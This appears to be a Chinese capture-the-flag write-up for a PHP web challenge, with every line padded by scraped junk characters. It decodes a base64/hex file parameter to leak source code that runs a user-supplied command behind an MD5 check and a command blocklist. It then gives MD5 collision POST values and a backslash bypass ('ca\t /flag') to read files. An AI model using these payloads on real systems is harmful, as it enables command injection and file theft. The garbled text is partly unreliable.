|
|
$ }( l- c2 F0 ?' t: r8 [1 H& X<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>
1 }: [* n0 s; v, V<p> </p>
2 D2 C J# |% |5 |# m; d<p> </p>
G: \+ t* m, L<p> 题目打开如下,?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=,同时查看源代码</p>
. F1 m0 C! K2 u8 o( B! i4 C<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>
: W( R# y8 O* n1 M% i" U0 t( w1 Z<p> </p>
) j4 C9 Z5 Z: h<p> </p>
' q$ a6 L; p0 o3 P1 N# ]<p>这里有个MD5 is funny,说明这个题目大概率跟MD5有关</p>/ E" {$ B9 K& r0 ?4 c4 b: F
<p>然后我抓包了一下,消息头里面没有什么特殊的东西,于是我尝试从url入手</p>1 ? H- `) K3 c/ ]' M9 T3 p5 @- ?
<p>首先把那个进行一次base64位解码</p>$ n/ o4 B+ ?( K- c& t S
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>
) f3 n7 f" M# a7 ~6 m; Y) X i<p> </p>5 d) K9 `9 z& s% H$ ]3 h" I/ f
<p> </p>1 c3 @& {( X* O- z: o5 U) L( b+ s) p
<p> 解码一次以后还是很像base64编码,于是又解码一次</p>
, g, w* ?" @; {<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>
' o0 t1 O6 u, J5 G8 P/ [$ }<p> </p>
5 g5 D0 p$ r3 }3 C<p> </p>% O; c- B) I$ v' y
<p> 然后用hex解码一下得到了</p>& [& | U1 G8 ]
<div class="cnblogs_Highlighter">2 J. `9 \& J2 d! ]( w
<pre class="brush:sql;gutter:true;">555.png# H& n1 F3 q) I
</pre>% h* Q# Z. Q }+ |/ x7 a8 d' m* [
</div>
5 w: G* q' e) F* G1 g<p> 用同样的方法把index.php进行加密</p>
& ]3 t+ ], q2 {/ k) _+ @0 s<div class="cnblogs_Highlighter">
: c- N) c+ A8 [2 Q, A/ D2 |# X<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN3& @+ j; a- O. _3 e2 D! v
</pre>
5 k+ p' u% L4 P6 d/ _0 w5 M( d</div>
- i/ ]5 r0 B; b% g# P+ `<p> 然后输入到地址栏</p>
+ I |5 i& \& u9 D! x<p> 然后查看源代码,把源代码里面的那一串base64的编码解码</p>- a W5 D Y& R+ E0 Q) D: p
<div class="cnblogs_code">
0 X' t6 E, I7 f M' B B* \7 K<pre><?<span style="color: rgba(0, 0, 0, 1)">php
8 u% G8 y+ H7 ]; O& S4 z; q2 @+ E</span><span style="color: rgba(0, 128, 128, 1)">error_reporting</span>(<span style="color: rgba(255, 0, 255, 1)">E_ALL</span> || ~ <span style="color: rgba(255, 0, 255, 1)">E_NOTICE</span><span style="color: rgba(0, 0, 0, 1)">);
h c& {# }1 R" A</span><span style="color: rgba(0, 128, 128, 1)">header</span>('content-type:text/html;charset=utf-8'<span style="color: rgba(0, 0, 0, 1)">);
( N+ _9 r3 `( C0 Z+ v2 o p, R</span><span style="color: rgba(128, 0, 128, 1)">$cmd</span> = <span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">];% E1 s3 b P- ^4 N
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (!<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img']) || !<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">]))
& d" W* o& K5 O; h- l </span><span style="color: rgba(0, 128, 128, 1)">header</span>('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd='<span style="color: rgba(0, 0, 0, 1)">);
* u! ^: F2 e+ I- P: B</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = hex2bin(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img'<span style="color: rgba(0, 0, 0, 1)">])));
* F4 s1 m; b. G' u
# ~6 o6 { A% Z/ ?3 {3 E' D& W2 Q9 X+ N</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = <span style="color: rgba(0, 128, 128, 1)">preg_replace</span>("/[^a-zA-Z0-9.]+/", "", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">);" c4 z& m' X. o' |( [
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/flag/i", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">)) {
4 T' d \0 |% S9 f' [ </span><span style="color: rgba(0, 0, 255, 1)">echo</span> '<img src ="./ctf3.jpeg">'<span style="color: rgba(0, 0, 0, 1)">;7 p) s! X: O, \9 m" s# J4 {3 U& p
</span><span style="color: rgba(0, 0, 255, 1)">die</span>("xixi~ no flag"<span style="color: rgba(0, 0, 0, 1)">);( J a5 S9 Q' e, C- F
} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
1 w m+ A5 ~3 ^* f, l </span><span style="color: rgba(128, 0, 128, 1)">$txt</span> = <span style="color: rgba(0, 128, 128, 1)">base64_encode</span>(<span style="color: rgba(0, 128, 128, 1)">file_get_contents</span>(<span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">));- c7 X, @# J, A
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<img src='data:image/gif;base64," . <span style="color: rgba(128, 0, 128, 1)">$txt</span> . "'></img>"<span style="color: rgba(0, 0, 0, 1)">;' r8 C, M; R- @* f. ^
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<br>"<span style="color: rgba(0, 0, 0, 1)">;
% Z J( M8 l0 A+ m( S}2 X+ [7 z) |, P
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">;! g5 l ^; k7 W( k7 K9 ~$ I
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<br>"<span style="color: rgba(0, 0, 0, 1)">;
n9 G' K9 E& \8 l0 J</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">)) {
) c6 \( J: q9 z- b$ x" J* U# j </span><span style="color: rgba(0, 0, 255, 1)">echo</span>("forbid ~"<span style="color: rgba(0, 0, 0, 1)">);
% y; D9 G+ U( R7 y( ? </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<br>"<span style="color: rgba(0, 0, 0, 1)">;
& s- G ~ A# y) t} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {& s. V3 t) Q+ l; K) A
</span><span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] && <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
+ d$ d9 m2 i# g- L6 r( G3 _7 K </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
q7 g& i5 ~4 c- Y$ D' N+ D+ f1 ~ } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
8 d: B% F: S) O6 I3 ] </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);# d& J, T. D4 U
}' ~ q! O+ L8 Z3 b$ W
}
/ n0 w: F4 y) _& T3 R
, @$ J/ ?. @7 ?</span>?>% r$ b4 a: v( A5 r% s3 T* Z
<html>" g5 o/ K6 B% ~" v$ G
<style><span style="color: rgba(0, 0, 0, 1)">
* G# W f S+ `4 _* r8 \ body{5 @- M' A" m* H
background</span>:url(./bj.png) no-<span style="color: rgba(0, 0, 0, 1)">repeat center center;( ~1 X0 }, C5 \% g! ?
background</span>-size:<span style="color: rgba(0, 0, 0, 1)">cover;; Y; U3 B$ {; S8 T' Q
background</span>-attachment:<span style="color: rgba(0, 0, 0, 1)">fixed;. F9 [0 h- m. L4 _9 `7 N
background</span>-color:<span style="color: rgba(0, 128, 0, 1)">#</span><span style="color: rgba(0, 128, 0, 1)">CCCCCC;</span>
8 ?/ r* |; J% W) N3 B<span style="color: rgba(0, 0, 0, 1)">}
# [& _1 d4 l% L! X</span></style>
0 k* l( C( `) j2 b' u<body>$ H( o. z' z. W, V, f3 u4 m
</body>
6 f; \. I: R7 B$ Z" h4 Z; X</html></pre>
L4 `/ e. X& v</div>% J9 @4 p: a/ [) m1 V' |( v' g
<p>结合前面的推断,关键代码就在</p>
3 t' w6 y1 G" U' a& e" k. U% O<div class="cnblogs_code">
) L- A4 W" R5 X, {, h) b" c9 |<pre> <span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] && <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {1 J7 _" ^, U y6 u5 D* {6 ~: t
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
F+ \( d$ }- w2 B) r- F } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
8 [' d0 v2 r) K9 k% Y </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);' b* L4 v D2 n* t
}</span></pre>) Y+ V2 t1 U& g
</div> ~ E- r8 u3 r8 k, R9 m1 M
<p>这种MD5是md5强碰撞</p>
& i+ G2 M- Q, L/ N8 \7 G<div class="cnblogs_Highlighter">
; e0 Z) t7 E1 H+ x( C<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
% }- V+ z0 {' ]; _6 u7 \</pre>3 A( c6 K1 o4 {6 p- z. P4 Y
</div>
+ A0 p7 [5 V. V6 o! Z<div class="cnblogs_Highlighter">
( _. A$ h9 x( j<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
0 W2 c% P4 x& V: R2 Z' }5 Q</pre>
4 l. e5 Y6 P# R/ ]! B, u</div>$ X( |6 b) h. F [2 y2 V
<p> 只需要这样就可以把cmd里面的当成命令来处理。</p>
+ q6 j, C$ U0 z" f2 n<p>于是采用payload:</p>9 o1 y2 |' b5 A
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>
& t6 V' W' f8 a z6 o" o. W; G<p> </p>3 S. J/ E; M5 R+ O1 e, w k
<p> 因为'\'并没有被屏蔽所以可以这么绕过</p>
+ f; A/ q3 |$ B! L* v1 \<p>ls和l\s在命令执行的时候结果是一样的。</p>
2 c$ ?1 u6 G- y: w7 n9 n# m<p>然后发现根目录里面有/flag</p>
1 z( V0 g; g/ r" D" B<p>于是payload:</p>
& X# Z( X& y) W' L# e- j8 J2 l<div class="cnblogs_Highlighter">
% N" ?$ _4 }! D5 I<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag$ I% y' x( F0 E3 k" A
</pre>
* f: K$ _9 l& N9 D5 F1 V</div>
& G5 s1 `% \/ K! ~$ e4 V( t" B<p> 对于这个题目,因为他没有屏蔽sort和dir</p>( C, X N0 A2 p
<p>所以查看也可以用dir来代替ls,cat可以用sort来代替。</p>
, } {; w- H0 `4 f<p> </p>* j8 r. q' b3 p5 l
|
|